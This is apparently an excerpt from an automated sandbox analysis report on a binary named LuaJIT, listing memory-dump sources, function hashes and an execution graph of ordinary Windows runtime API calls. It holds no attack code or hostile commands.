                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _handle_error
                                                                                                                                                                                                                              • String ID: "$exp
                                                                                                                                                                                                                              • API String ID: 1757819995-2878093337
                                                                                                                                                                                                                              • Opcode ID: 9fdd603b76a48d23854c83fa128c3ec0a1d065c38e77db87c8ff278af7f6c3ee
                                                                                                                                                                                                                              • Instruction ID: ca4873d3ef99851707e2295eccbb18d21b71ba66e4e92823c0f6e26d6cf04d35
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9fdd603b76a48d23854c83fa128c3ec0a1d065c38e77db87c8ff278af7f6c3ee
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4801C837A38B8887E220DF25D0492AAB7A0FFEA744F641315EB8416660CBBDD481DF00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772459A64 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DefaultUsertry_get_function
                                                                                                                                                                                                                              • String ID: GetUserDefaultLocaleName
                                                                                                                                                                                                                              • API String ID: 3217810228-151340334
                                                                                                                                                                                                                              • Opcode ID: c694d8fed7e650d7ae902cf5b79a7869b30411a5ab2e26c2c3eb6ddf0b08f9ee
                                                                                                                                                                                                                              • Instruction ID: 0f7e16fc0300d58100488c0dacd37bacdeda006db750ef8d6ffe9406c37a7545
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c694d8fed7e650d7ae902cf5b79a7869b30411a5ab2e26c2c3eb6ddf0b08f9ee
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5F03022F3854282EB147757FA805B492A26F4C790FC45035E97D4A755CEAC9D44CB60
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772459AC8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF772459AF9
                                                                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,-00000018,00007FF77245D7C2,?,?,00000000,00007FF77245D6BA,?,?,?,00007FF77244B0BD), ref: 00007FF772459B13
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                                                                                                                                              • String ID: InitializeCriticalSectionEx
                                                                                                                                                                                                                              • API String ID: 539475747-3084827643
                                                                                                                                                                                                                              • Opcode ID: e01acae747cdeda195b10ee82353d8871bdea6c8613bfa92815bb754a0d07925
                                                                                                                                                                                                                              • Instruction ID: 1caa96998adab222f07fd12e5c046600f29728d64c15588cec610c63c4c4907f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e01acae747cdeda195b10ee82353d8871bdea6c8613bfa92815bb754a0d07925
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9DF01D22F38A4191FA157B43A8400A9A221FF48B90F845135E97D17B55CEACDD55CBA0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772459828 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF772459851
                                                                                                                                                                                                                              • TlsSetValue.KERNEL32(?,?,?,00007FF77245AB66,?,?,?,00007FF77244AF01,?,?,?,?,00007FF7724602A3), ref: 00007FF772459868
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Valuetry_get_function
                                                                                                                                                                                                                              • String ID: FlsSetValue
                                                                                                                                                                                                                              • API String ID: 738293619-3750699315
                                                                                                                                                                                                                              • Opcode ID: 30b8eb45ebde45efd7bf4f457bf1e11275edc514c445f36cbdbaff7140e65dd7
                                                                                                                                                                                                                              • Instruction ID: da94efed56fc6217103daa853395563801970d4bb0d05234e666c2365bbf17af
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 30b8eb45ebde45efd7bf4f457bf1e11275edc514c445f36cbdbaff7140e65dd7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EDE03963A3864291EA157B53E8440B8A222EF88790FC85036D97E0A795CEBCED54CB60
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7723ADEF0 Relevance: 5.1, APIs: 4, Instructions: 62COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF77239348C), ref: 00007FF7723ADF1F
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF77239348C), ref: 00007FF7723ADF83
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF77239348C), ref: 00007FF7723ADFB9
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF77239348C), ref: 00007FF7723AE003
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3168844106-0
                                                                                                                                                                                                                              • Opcode ID: d7064577febaf475c7bb8ae2d0a4322ba4b58d71bdf70b5fad720353a296914f
                                                                                                                                                                                                                              • Instruction ID: aec2d1a200c16a52b8aeb6762a441416ac2360080ca64586d506aa408982ded3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7064577febaf475c7bb8ae2d0a4322ba4b58d71bdf70b5fad720353a296914f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE314B37629B8586DB609B1AE44122ABBA0F789F98F041166EEDD43B29CE6CC140CF10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:3.3%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                                              Total number of Nodes:1348
                                                                                                                                                                                                                              Total number of Limit Nodes:42
                                                                                                                                                                                                                              execution_graph 75428 7ff6de4756dc 75439 7ff6de4bb100 75428->75439 75432 7ff6de47597e 75433 7ff6de47583b 75433->75432 75447 7ff6de4cee70 94 API calls 2 library calls 75433->75447 75435 7ff6de47589d 75435->75432 75448 7ff6de46b7a0 75435->75448 75437 7ff6de4758e9 Concurrency::details::_UnrealizedChore::_CancelViaToken 75457 7ff6de4cf070 94 API calls _wcsupr_s 75437->75457 75458 7ff6de4aab10 75439->75458 75441 7ff6de4bb138 75442 7ff6de4aab10 94 API calls 75441->75442 75443 7ff6de475725 75442->75443 75444 7ff6de4aaa90 75443->75444 75445 7ff6de4aaee0 94 API calls 75444->75445 75446 7ff6de4aaabe 75445->75446 75446->75433 75447->75435 75449 7ff6de46b9a5 75448->75449 75455 7ff6de46b7d8 type_info::_name_internal_method _free_nolock 75448->75455 75456 7ff6de46b8f6 75449->75456 75491 7ff6de460950 94 API calls strrchr 75449->75491 75451 7ff6de46b980 75485 7ff6de46c060 75451->75485 75452 7ff6de46b966 75490 7ff6de46be30 94 API calls type_info::_name_internal_method 75452->75490 75455->75451 75455->75452 75455->75456 75456->75437 75457->75432 75459 7ff6de4aab81 75458->75459 75460 7ff6de4aab2a 75458->75460 75461 7ff6de4aabd2 75459->75461 75465 7ff6de4aabbc 75459->75465 75462 7ff6de4aab4e 75460->75462 75463 7ff6de4aab3d 75460->75463 75468 7ff6de4aab4c 75461->75468 75470 7ff6de4aade0 VirtualProtect 75461->75470 75480 7ff6de4aade0 VirtualProtect 75462->75480 75474 7ff6de4aaee0 75463->75474 75467 7ff6de4aaee0 94 API calls 75465->75467 75467->75468 75468->75441 75472 7ff6de4aac1f 75470->75472 75472->75468 75483 7ff6de4aae40 94 API calls 2 library calls 75472->75483 75475 7ff6de4aaefe 75474->75475 75478 7ff6de4aaf2e 75474->75478 75476 7ff6de4aade0 VirtualProtect 75475->75476 75477 7ff6de4aaf20 75476->75477 75477->75478 75484 7ff6de4aae40 94 API calls 2 library calls 75477->75484 75478->75468 75481 7ff6de4aab67 75480->75481 75481->75468 75482 7ff6de4aae40 94 API calls 2 library calls 75481->75482 75482->75468 75483->75468 75484->75478 75492 7ff6de468d00 75485->75492 75487 7ff6de46c09a Concurrency::details::_UnrealizedChore::_CancelViaToken memcpy_s 75488 7ff6de46c285 75487->75488 75497 7ff6de46b310 94 API calls 3 library calls 75487->75497 75488->75456 75490->75456 75491->75456 75493 7ff6de468d45 75492->75493 75498 7ff6de478b40 75492->75498 75494 7ff6de468d64 75493->75494 75507 7ff6de460690 94 API calls 2 library calls 75493->75507 75494->75487 75497->75488 75499 7ff6de478b73 75498->75499 75500 7ff6de478b60 75498->75500 75501 7ff6de478b7b 75499->75501 75502 7ff6de478b8e 75499->75502 75508 7ff6de47ca40 75500->75508 75518 7ff6de47c230 75501->75518 75505 7ff6de478b6f 75502->75505 75522 7ff6de47d9e0 75502->75522 75505->75493 75507->75494 75509 7ff6de47ca60 75508->75509 75513 7ff6de47cb15 75508->75513 75510 7ff6de47cad6 75509->75510 75515 7ff6de47cb21 75509->75515 75530 7ff6de478c90 GetLastError 75510->75530 75511 7ff6de47cfc2 75511->75513 75536 7ff6de47af30 GetLastError VirtualQuery VirtualFree SetLastError 75511->75536 75513->75505 75515->75511 75515->75513 75517 7ff6de47d074 75515->75517 75517->75513 75537 7ff6de47a720 GetLastError VirtualQuery VirtualFree SetLastError 75517->75537 75519 7ff6de47c260 75518->75519 75521 7ff6de47c2e0 75519->75521 75538 7ff6de47a3f0 75519->75538 75521->75505 75523 7ff6de47da0d 75522->75523 75527 7ff6de47da01 75522->75527 75524 7ff6de47dab6 75523->75524 75525 7ff6de47ca40 4 API calls 75523->75525 75526 7ff6de47c230 6 API calls 75524->75526 75524->75527 75525->75524 75528 7ff6de47dcff memcpy_s 75526->75528 75527->75505 75528->75527 75529 7ff6de47ca40 4 API calls 75528->75529 75529->75527 75535 7ff6de478cb2 75530->75535 75531 7ff6de478d65 SetLastError 75533 7ff6de478cd9 75531->75533 75532 7ff6de478cbe VirtualQuery 75532->75533 75532->75535 75533->75513 75534 7ff6de478d18 VirtualFree 75534->75533 75534->75535 75535->75531 75535->75532 75535->75533 75535->75534 75536->75513 75537->75513 75539 7ff6de47a436 75538->75539 75540 7ff6de47a421 75538->75540 75543 7ff6de47a443 75539->75543 75548 7ff6de478bb0 GetLastError VirtualAlloc SetLastError 75539->75548 75544 7ff6de478e60 75540->75544 75543->75521 75545 7ff6de478e94 75544->75545 75547 7ff6de478e9e 75544->75547 75550 7ff6de478c20 GetLastError VirtualAlloc SetLastError 75545->75550 75547->75539 75549 7ff6de478bf3 75548->75549 75549->75543 75551 7ff6de478c63 75550->75551 75551->75547 75552 7ff6de4fd4e4 75577 7ff6de4fd6a8 75552->75577 75555 7ff6de4fd630 75605 7ff6de4fd9d4 7 API calls 2 library calls 75555->75605 75556 7ff6de4fd500 __scrt_acquire_startup_lock 75558 7ff6de4fd63a 75556->75558 75559 7ff6de4fd51e 75556->75559 75606 7ff6de4fd9d4 7 API calls 2 library calls 75558->75606 75567 7ff6de4fd53f __scrt_release_startup_lock 75559->75567 75585 7ff6de52675c 75559->75585 75562 7ff6de4fd543 75563 7ff6de4fd645 __CxxCallCatchBlock _free_nolock 75564 7ff6de4fd5c9 75590 7ff6de4fdb20 75564->75590 75566 7ff6de4fd5ce 75593 7ff6de526688 75566->75593 75567->75562 75567->75564 75602 7ff6de51adf8 26 API calls 75567->75602 75574 7ff6de4fd5f1 75574->75563 75604 7ff6de4fd83c 7 API calls __scrt_initialize_crt 75574->75604 75576 7ff6de4fd608 75576->75562 75607 7ff6de4fdc9c 75577->75607 75580 7ff6de4fd6d7 75609 7ff6de528760 75580->75609 75583 7ff6de4fd4f8 75583->75555 75583->75556 75587 7ff6de52676f 75585->75587 75586 7ff6de52678c 75586->75567 75587->75586 75893 7ff6de501ae8 75587->75893 75905 7ff6de4fd400 75587->75905 75990 7ff6de4fe110 75590->75990 75594 7ff6de53695c 37 API calls 75593->75594 75596 7ff6de526697 75594->75596 75595 7ff6de4fd5d6 75598 7ff6de4550e0 75595->75598 75596->75595 75992 7ff6de536c94 26 API calls _Wcsftime 75596->75992 75599 7ff6de4550fd 75598->75599 75993 7ff6de456b70 75599->75993 75602->75564 75603 7ff6de4fdb64 GetModuleHandleW 75603->75574 75604->75576 75605->75558 75606->75563 75608 7ff6de4fd6ca __scrt_dllmain_crt_thread_attach 75607->75608 75608->75580 75608->75583 75610 7ff6de53ad18 75609->75610 75611 7ff6de4fd6dc 75610->75611 75615 7ff6de5368a4 75610->75615 75630 7ff6de53695c 75610->75630 75611->75583 75614 7ff6de4ff154 7 API calls 2 library calls 75611->75614 75614->75583 75616 7ff6de5368c7 75615->75616 75617 7ff6de5368d1 75616->75617 75645 7ff6de5291ac EnterCriticalSection 75616->75645 75620 7ff6de536943 75617->75620 75636 7ff6de5287cc 75617->75636 75620->75610 75624 7ff6de53695b 75626 7ff6de5369ae 75624->75626 75627 7ff6de52aa74 26 API calls 75624->75627 75626->75610 75628 7ff6de536998 75627->75628 75629 7ff6de5366e4 37 API calls 75628->75629 75629->75626 75631 7ff6de536969 75630->75631 75632 7ff6de5369ae 75630->75632 75649 7ff6de52aa74 75631->75649 75632->75610 75646 7ff6de51a6c0 EnterCriticalSection LeaveCriticalSection __CxxCallCatchBlock 75636->75646 75638 7ff6de5287d5 75639 7ff6de5287e4 75638->75639 75647 7ff6de51a710 26 API calls 5 library calls 75638->75647 75641 7ff6de528817 __CxxCallCatchBlock 75639->75641 75642 7ff6de5287ed IsProcessorFeaturePresent 75639->75642 75643 7ff6de5287fc 75642->75643 75648 7ff6de528900 6 API calls 3 library calls 75643->75648 75646->75638 75647->75639 75648->75641 75650 7ff6de52aa85 75649->75650 75654 7ff6de52aa8a 75649->75654 75692 7ff6de5297e0 6 API calls try_get_function 75650->75692 75653 7ff6de52aaa9 75655 7ff6de52aa92 75653->75655 75694 7ff6de52921c 75653->75694 75654->75655 75693 7ff6de529828 6 API calls try_get_function 75654->75693 75657 7ff6de5287cc __CxxCallCatchBlock 26 API calls 75655->75657 75662 7ff6de52ab0c 75655->75662 75659 7ff6de52ab1a 75657->75659 75660 7ff6de52aada 75703 7ff6de529828 6 API calls try_get_function 75660->75703 75661 7ff6de52aaca 75701 7ff6de529828 6 API calls try_get_function 75661->75701 75674 7ff6de5366e4 75662->75674 75665 7ff6de52aad1 75702 7ff6de529294 14 API calls 2 library calls 75665->75702 75666 7ff6de52aae2 75667 7ff6de52aaf8 75666->75667 75668 7ff6de52aae6 75666->75668 75705 7ff6de52a750 14 API calls _invalid_parameter_noinfo 75667->75705 75704 7ff6de529828 6 API calls try_get_function 75668->75704 75672 7ff6de52ab00 75706 7ff6de529294 14 API calls 2 library calls 75672->75706 75675 7ff6de5368a4 37 API calls 75674->75675 75676 7ff6de53670d 75675->75676 75742 7ff6de5363f0 75676->75742 75679 7ff6de536727 75679->75632 75684 7ff6de5367c7 75685 7ff6de5367ce 75684->75685 75689 7ff6de5367f3 75684->75689 75686 7ff6de51aef8 _get_daylight 14 API calls 75685->75686 75687 7ff6de5367d3 75686->75687 75766 7ff6de529294 14 API calls 2 library calls 75687->75766 75688 7ff6de536830 75688->75687 75768 7ff6de536234 23 API calls 5 library calls 75688->75768 75689->75688 75767 7ff6de529294 14 API calls 2 library calls 75689->75767 75693->75653 75699 7ff6de52922d wcsftime 75694->75699 75695 7ff6de52927e 75708 7ff6de51aef8 75695->75708 75696 7ff6de529262 RtlAllocateHeap 75697 7ff6de52927c 75696->75697 75696->75699 75697->75660 75697->75661 75699->75695 75699->75696 75707 7ff6de53addc EnterCriticalSection LeaveCriticalSection wcsftime 75699->75707 75701->75665 75702->75655 75703->75666 75704->75665 75705->75672 75706->75655 75707->75699 75711 7ff6de52ab1c GetLastError 75708->75711 75710 7ff6de51af01 75710->75697 75712 7ff6de52ab43 75711->75712 75713 7ff6de52ab3e 75711->75713 75717 7ff6de52ab4b SetLastError 75712->75717 75735 7ff6de529828 6 API calls try_get_function 75712->75735 75734 7ff6de5297e0 6 API calls try_get_function 75713->75734 75716 7ff6de52ab66 75716->75717 75719 7ff6de52921c _wcsupr_s 12 API calls 75716->75719 75717->75710 75720 7ff6de52ab79 75719->75720 75721 7ff6de52ab97 75720->75721 75722 7ff6de52ab87 75720->75722 75738 7ff6de529828 6 API calls try_get_function 75721->75738 75736 7ff6de529828 6 API calls try_get_function 75722->75736 75725 7ff6de52ab9f 75726 7ff6de52abb5 75725->75726 75727 7ff6de52aba3 75725->75727 75740 7ff6de52a750 14 API calls _invalid_parameter_noinfo 75726->75740 75739 7ff6de529828 6 API calls try_get_function 75727->75739 75731 7ff6de52ab8e 75737 7ff6de529294 14 API calls 2 library calls 75731->75737 75732 7ff6de52abbd 75741 7ff6de529294 14 API calls 2 library calls 75732->75741 75735->75716 75736->75731 75737->75717 75738->75725 75739->75731 75740->75732 75741->75717 75769 7ff6de503ea8 75742->75769 75745 7ff6de536410 GetOEMCP 75747 7ff6de536437 75745->75747 75746 7ff6de536422 75746->75747 75748 7ff6de536427 GetACP 75746->75748 75747->75679 75749 7ff6de52a290 75747->75749 75748->75747 75750 7ff6de52a2db 75749->75750 75755 7ff6de52a29f wcsftime 75749->75755 75751 7ff6de51aef8 _get_daylight 14 API calls 75750->75751 75754 7ff6de52a2e0 75751->75754 75752 7ff6de52a2c2 HeapAlloc 75753 7ff6de52a2d9 75752->75753 75752->75755 75753->75754 75754->75687 75757 7ff6de5369d8 75754->75757 75755->75750 75755->75752 75814 7ff6de53addc EnterCriticalSection LeaveCriticalSection wcsftime 75755->75814 75758 7ff6de5363f0 28 API calls 75757->75758 75759 7ff6de536a03 75758->75759 75760 7ff6de536a83 __scrt_get_show_window_mode _handle_error 75759->75760 75761 7ff6de536a40 IsValidCodePage 75759->75761 75760->75684 75761->75760 75762 7ff6de536a51 75761->75762 75763 7ff6de536a88 GetCPInfo 75762->75763 75765 7ff6de536a5a __scrt_get_show_window_mode 75762->75765 75763->75760 75763->75765 75815 7ff6de536500 75765->75815 75766->75679 75767->75688 75768->75687 75770 7ff6de503ecc 75769->75770 75776 7ff6de503ec7 75769->75776 75770->75776 75777 7ff6de52a9a0 GetLastError 75770->75777 75774 7ff6de503f0a 75805 7ff6de52ac7c 26 API calls _Wcsftime 75774->75805 75776->75745 75776->75746 75778 7ff6de52a9c2 75777->75778 75782 7ff6de52a9c7 75777->75782 75806 7ff6de5297e0 6 API calls try_get_function 75778->75806 75781 7ff6de52a9ea 75783 7ff6de52a9cf SetLastError 75781->75783 75785 7ff6de52921c _wcsupr_s 14 API calls 75781->75785 75782->75783 75807 7ff6de529828 6 API calls try_get_function 75782->75807 75787 7ff6de52aa6e 75783->75787 75788 7ff6de503ee7 75783->75788 75786 7ff6de52a9fd 75785->75786 75789 7ff6de52aa1b 75786->75789 75790 7ff6de52aa0b 75786->75790 75791 7ff6de5287cc __CxxCallCatchBlock 24 API calls 75787->75791 75804 7ff6de52ac48 26 API calls _Wcsftime 75788->75804 75810 7ff6de529828 6 API calls try_get_function 75789->75810 75808 7ff6de529828 6 API calls try_get_function 75790->75808 75793 7ff6de52aa73 75791->75793 75795 7ff6de52aa12 75809 7ff6de529294 14 API calls 2 library calls 75795->75809 75796 7ff6de52aa23 75797 7ff6de52aa39 75796->75797 75798 7ff6de52aa27 75796->75798 75812 7ff6de52a750 14 API calls _invalid_parameter_noinfo 75797->75812 75811 7ff6de529828 6 API calls try_get_function 75798->75811 75802 7ff6de52aa41 75813 7ff6de529294 14 API calls 2 library calls 75802->75813 75804->75774 75805->75776 75807->75781 75808->75795 75809->75783 75810->75796 75811->75795 75812->75802 75813->75783 75814->75755 75816 7ff6de53653d GetCPInfo 75815->75816 75823 7ff6de536633 _handle_error 75815->75823 75819 7ff6de536550 75816->75819 75816->75823 75818 7ff6de5365c7 75837 7ff6de53e6ec 75818->75837 75824 7ff6de5392ec 75819->75824 75822 7ff6de53e6ec 31 API calls 75822->75823 75823->75760 75825 7ff6de503ea8 _Wcsftime 26 API calls 75824->75825 75826 7ff6de53932e 75825->75826 75842 7ff6de532ff4 75826->75842 75828 7ff6de539364 75829 7ff6de52a290 wcsftime 15 API calls 75828->75829 75830 7ff6de53936b _handle_error 75828->75830 75831 7ff6de539390 __scrt_get_show_window_mode wcsftime 75828->75831 75829->75831 75830->75818 75832 7ff6de532ff4 wcsftime MultiByteToWideChar 75831->75832 75833 7ff6de539428 75831->75833 75834 7ff6de53940a 75832->75834 75833->75830 75835 7ff6de529294 __free_lconv_mon 14 API calls 75833->75835 75834->75833 75836 7ff6de53940e GetStringTypeW 75834->75836 75835->75830 75836->75833 75838 7ff6de503ea8 _Wcsftime 26 API calls 75837->75838 75839 7ff6de53e711 75838->75839 75845 7ff6de53e3d4 75839->75845 75841 7ff6de5365fa 75841->75822 75843 7ff6de532ffc MultiByteToWideChar 75842->75843 75846 7ff6de53e416 75845->75846 75847 7ff6de532ff4 wcsftime MultiByteToWideChar 75846->75847 75848 7ff6de53e460 75847->75848 75849 7ff6de53e69f _handle_error 75848->75849 75850 7ff6de52a290 wcsftime 15 API calls 75848->75850 75853 7ff6de53e493 wcsftime 75848->75853 75849->75841 75850->75853 75851 7ff6de532ff4 wcsftime MultiByteToWideChar 75852 7ff6de53e505 75851->75852 75854 7ff6de53e597 75852->75854 75871 7ff6de529bf4 75852->75871 75853->75851 75853->75854 75854->75849 75881 7ff6de529294 14 API calls 2 library calls 75854->75881 75858 7ff6de53e5a6 75861 7ff6de52a290 wcsftime 15 API calls 75858->75861 75863 7ff6de53e5c0 wcsftime 75858->75863 75859 7ff6de53e554 75859->75854 75860 7ff6de529bf4 __crtLCMapStringW 7 API calls 75859->75860 75860->75854 75861->75863 75862 7ff6de529bf4 __crtLCMapStringW 7 API calls 75865 7ff6de53e641 75862->75865 75863->75854 75863->75862 75864 7ff6de53e676 75864->75854 75880 7ff6de529294 14 API calls 2 library calls 75864->75880 75865->75864 75879 7ff6de533050 WideCharToMultiByte 75865->75879 75882 7ff6de529378 75871->75882 75874 7ff6de529c89 75892 7ff6de529cd0 5 API calls 2 library calls 75874->75892 75875 7ff6de529c37 LCMapStringEx 75876 7ff6de529cbb 75875->75876 75876->75854 75876->75858 75876->75859 75878 7ff6de529c93 LCMapStringW 75878->75876 75880->75854 75881->75849 75883 7ff6de5293d9 75882->75883 75890 7ff6de5293d4 try_get_function 75882->75890 75883->75874 75883->75875 75884 7ff6de5294bc 75884->75883 75887 7ff6de5294ca GetProcAddress 75884->75887 75885 7ff6de529408 LoadLibraryW 75886 7ff6de529429 GetLastError 75885->75886 75885->75890 75886->75890 75888 7ff6de5294db 75887->75888 75888->75883 75889 7ff6de5294a1 FreeLibrary 75889->75890 75890->75883 75890->75884 75890->75885 75890->75889 75891 7ff6de529463 LoadLibraryExW 75890->75891 75891->75890 75892->75878 75894 7ff6de501b12 75893->75894 75895 7ff6de52921c _wcsupr_s 14 API calls 75894->75895 75896 7ff6de501b31 75895->75896 75922 7ff6de529294 14 API calls 2 library calls 75896->75922 75898 7ff6de501b3f 75899 